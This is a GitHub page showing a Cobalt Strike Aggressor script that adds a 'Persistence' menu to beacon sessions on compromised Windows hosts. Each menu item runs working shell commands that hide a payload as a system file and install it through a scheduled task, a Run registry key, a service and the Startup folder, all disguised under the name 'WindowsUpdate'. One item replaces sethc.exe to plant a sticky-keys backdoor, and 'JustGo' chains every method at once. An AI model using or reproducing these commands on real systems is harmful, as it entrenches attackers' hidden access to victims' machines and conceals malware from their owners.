-
Notifications
You must be signed in to change notification settings - Fork 29
/
PrivilegeHelperEN.cna
77 lines (62 loc) · 2.48 KB
/
PrivilegeHelperEN.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
popup beacon_bottom {
menu "Persistence" {
item "setFilePath" {
local('$bid');
foreach $bid ($1){
prompt_text("filePath", $filePath, {
$filePath = $1;
return $filePath;
});
}
}
item "hiddenFile" {
local('$bid');
foreach $bid ($1){
bshell($1, "attrib \"$filePath\" +s +h");
}
}
item "schtasks" {
local('$bid');
foreach $bid ($1){
bshell($1, "schtasks /create /tn WindowsUpdate /tr \"$filePath\" /sc minute /mo 1");
}
}
item "regedit"{
local('$bid');
foreach $bid ($1){
bshell($1, "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"$filePath\" /f");
}
}
item "SC Service"{
local('$bid');
foreach $bid ($1){
bshell($1, "sc create \"WindowsUpdate\" binpath= \"cmd /c start \"$filePath\"\"&&sc config \"WindowsUpdate\" start= auto&&net start WindowsUpdate");
}
}
item "shift backdoor"{
local('$bid');
foreach $bid ($1){
bshell($1, "takeown /f C:\\windows\\system32\\sethc.* /a /r /d y&&cacls C:\\windows\\system32\\sethc.exe /T /E /G system:F&© \"$filePath\" C:\\windows\\system32\\sethc.exe /y");
}
}
item "StartupPath"{
local('$bid');
foreach $bid ($1){
bshell($1, "copy \"$filePath\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" /y");
bshell($1, "attrib \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" +s +h");
}
}
item "JustGo" {
local('$bid');
foreach $bid ($1){
bshell($1, "attrib \"$filePath\" +s +h");
bshell($1, "schtasks /create /tn WindowsUpdate /tr \"$filePath\" /sc minute /mo 1");
bshell($1, "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d \"$filePath\" /f");
bshell($1, "sc create \"WindowsUpdate\" binpath= \"cmd /c start \"$filePath\"\"&&sc config \"WindowsUpdate\" start= auto&&net start WindowsUpdate");
bshell($1, "takeown /f C:\\windows\\system32\\sethc.* /a /r /d y&&cacls C:\\windows\\system32\\sethc.exe /T /E /G system:F&© \"$filePath\" C:\\windows\\system32\\sethc.exe /y");
bshell($1, "copy \"$filePath\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" /y");
bshell($1, "attrib \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe\" +s +h");
}
}
}
}